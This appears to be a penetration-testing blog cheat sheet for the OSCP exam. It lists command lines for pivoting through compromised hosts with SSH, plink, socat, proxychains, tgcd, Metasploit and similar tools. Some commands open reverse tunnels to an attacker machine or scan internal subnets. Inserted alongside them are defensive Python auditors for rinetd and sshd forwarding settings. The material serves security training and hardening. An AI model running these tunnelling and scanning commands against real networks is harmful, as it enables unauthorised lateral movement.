🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement

#1: Pivoting with rinetd

# rinetd.conf
# bindaddress bindport connectaddress connectport
$PUBLICIP 80 $IP 80

rinetd -f -c rinetd.conf
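A defender reviewing a host for rinetd forwards wants to know which rules listen on an interface other than loopback. The script below is an added example, not code from the article or from the rinetd project: it parses the "bindaddress bindport connectaddress connectport" rule layout shown above, skips rinetd's global directives (logfile, allow, deny), and reports every rule whose bind address is reachable from other hosts. The configuration it parses is constructed for the example.

```python
"""Audit rinetd.conf forwarding rules for externally reachable binds.

Added example (not from the article or the rinetd project). It reads the
"bindaddress bindport connectaddress connectport" rule layout and reports
rules that listen on an interface other than loopback.
"""
import ipaddress

# rinetd keywords that are not forwarding rules.
GLOBAL_DIRECTIVES = {"logfile", "pidlogfile", "allow", "deny", "logcommon"}

# Constructed sample configuration, not taken from the page.
SAMPLE_CONF = """\
# bindaddress bindport connectaddress connectport
logfile /var/log/rinetd.log
allow 10.0.0.*
0.0.0.0 80 10.0.0.5 80
127.0.0.1 8443 10.0.0.5 443
"""


def _port(text, lineno):
    """Numeric ports are range-checked; anything else is kept as a service name."""
    if text.isdigit():
        value = int(text)
        if not 1 <= value <= 65535:
            raise ValueError(f"line {lineno}: port out of range: {text!r}")
        return value
    return text


def parse_rules(text):
    """Return the forwarding rules as dicts; raise on malformed rule lines."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank line or comment
        fields = line.split()
        if fields[0].lower() in GLOBAL_DIRECTIVES:
            continue                      # global directive, not a forward
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: malformed rule: {raw!r}")
        bind_addr, bind_port, conn_addr, conn_port = fields[:4]
        rules.append({
            "line": lineno,
            "bind_addr": bind_addr, "bind_port": _port(bind_port, lineno),
            "conn_addr": conn_addr, "conn_port": _port(conn_port, lineno),
        })
    return rules


def is_exposed(bind_addr):
    """True when a listener on bind_addr is reachable from other hosts."""
    try:
        # 0.0.0.0 and :: are unspecified, not loopback, so they count as exposed.
        return not ipaddress.ip_address(bind_addr).is_loopback
    except ValueError:
        # A hostname rather than a literal address: only 'localhost' is local.
        return bind_addr.lower() != "localhost"


def exposed_rules(rules):
    """Subset of rules whose bind address is not loopback."""
    return [r for r in rules if is_exposed(r["bind_addr"])]


if __name__ == "__main__":
    for r in exposed_rules(parse_rules(SAMPLE_CONF)):
        print(f"line {r['line']}: {r['bind_addr']}:{r['bind_port']} -> "
              f"{r['conn_addr']}:{r['conn_port']} is reachable from other hosts")
```

Run against a real file with `parse_rules(open("/etc/rinetd.conf").read())`; the one rule flagged in the sample is the 0.0.0.0 bind, which is exactly the kind of forward that turns a host into a relay for everything that can reach it.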

#2: Pivoting with plink.exe

plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N

#3: Pivoting with SSH / OpenSSH

ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
ssh -L <localhost port>:<remote IP>:<remote port> $IP
ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP 
ssh -R <server side port>:<localhost>:<local port> $IP
ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>

#4: Pivoting with VPN over SSH

# /etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes

ssh user@server -w any:any
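The SSH tunnels in #3 (-L, -R, -D) and the layer-3 tunnel in #4 (-w) only work when sshd allows them: AllowTcpForwarding, GatewayPorts and PermitTunnel gate the three forwarding styles, and PermitRootLogin decides whether the pivot runs as root. The auditor below is an added example for both sections, not code from the article or from OpenSSH. It reads the global scope of an sshd_config, applies sshd's rule that the first value set for a keyword wins, fills in OpenSSH's documented defaults for keywords that are absent, and stops at the first Match block because settings there are conditional. Both sample configurations are constructed; the weak one consists of the two lines shown above.

```python
"""Audit the global scope of an sshd_config for tunnel-related directives.

Added example, not from the article or OpenSSH. First value per keyword
wins, absent keywords take the sshd_config(5) default, and parsing stops at
the first Match block (conditional scope, out of scope for this check).
"""

# OpenSSH default applied when the keyword is absent.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "permittunnel": "no",
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
}

# Values that do not let a compromised account become a network pivot.
ACCEPTABLE = {
    "permitrootlogin": {"no", "prohibit-password"},
    "permittunnel": {"no"},
    "allowtcpforwarding": {"no"},
    "gatewayports": {"no"},
}

# Constructed samples, not taken from a real host.
WEAK_CONF = """\
PermitRootLogin yes
PermitTunnel yes
"""

HARDENED_CONF = """\
PermitRootLogin no
PermitTunnel no
AllowTcpForwarding no
GatewayPorts no
Match User backup
    AllowTcpForwarding yes
"""


def parse_sshd_config(text):
    """Map lower-cased keyword -> first value seen in the global scope."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)          # keyword, then the rest
        key, value = parts[0], (parts[1] if len(parts) > 1 else "")
        if not value and "=" in key:         # sshd also accepts 'Keyword=value'
            key, _, value = key.partition("=")
        key = key.lower()
        if key == "match":
            break                            # conditional scope starts here
        settings.setdefault(key, value.strip().lower())   # first value wins
    return settings


def audit(text):
    """Return (keyword, effective value, set explicitly?) for each weak setting."""
    settings = parse_sshd_config(text)
    findings = []
    for key, default in DEFAULTS.items():
        explicit = key in settings
        value = settings.get(key, default)
        if value not in ACCEPTABLE[key]:
            findings.append((key, value, explicit))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}:")
        for key, value, explicit in audit(conf):
            origin = "explicit" if explicit else "default"
            print(f"  {key} = {value} ({origin}) allows forwarding/tunnelling")
```

Note that the weak configuration produces three findings, not two: AllowTcpForwarding is never mentioned, but its default is yes, so -L/-R/-D forwards are permitted on that host unless the directive is set explicitly. Run `audit(open("/etc/ssh/sshd_config").read())` to check a real host; Match-scoped exceptions (as in the hardened sample) have to be reviewed by hand.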

#5: Pivoting with proxychains

ssh -f -N -R 2222:127.0.0.1:22 root@kali
ssh -f -N -D 127.0.0.1:8080 -p 2222 hax0r@127.0.0.1
[ProxyList]
socks4 127.0.0.1 8080
proxychains nmap --top-ports=20 -sT -Pn $IP/24

#6: Pivoting with FreeSSHd.exe

#7: Pivoting with tinyproxy

#8: Pivoting with rpivot

  • Reverse SOCKS proxy (the opposite of ssh -D); supports Windows credentials for use through a corporate proxy
  • The server is started on the pentester’s machine and listens for incoming connections from the client.
  • Written in Python with no external dependencies
python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP
python client.py --server-ip $IP --server-port 9900

#9: Pivoting with 3proxy

# 3proxy.config
socks -p1080 # socks proxy
tcppm <localport> <targethost> <targetport>

./3proxy 3proxy.config &

#10: Pivoting with tgcd

  • CC (ConnectConnect)
  • LL (ListenListen)
  • PF (PortForwarder)
tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10
tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10

#11: Pivoting with Metasploit

msf > use auxiliary/server/socks4a
msf > run -j
meterpreter > run autoroute -s $IP/24
meterpreter > run autoroute -p
msf exploit(handler) > route add $IP 255.255.255.0 1

#12: Pivoting with ssf

ssfd -p 11111
ssf -D 22222 -p 11111 $TARGET_IP

#13: Pivoting with socat

  • Socat TCP GENDER CHANGER
socat -d -d -d -t5 tcp:$IP:80,forever,interval=10,fork tcp:localhost:80
socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10
mozilla http://127.0.0.1/
  • Socat SSH encapsulation into SSL
socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'
ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080'" $SERVER
  • Socat SSH deception (Bounds back to the client ssh server)
socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"

#14: sshuttle

sshuttle -r pivotmachine@192.168.10.5 192.168.30.0/24

#15: pwncat

pwncat -L 0.0.0.0:5050 example.org 3306
pwncat -R 10.0.0.1:4444 example.org 3306

The Unweary Pentester 🥷

Pentesting since 2001. Writing about infrastructure, Linux, Windows, Web and blockchain cybersecurity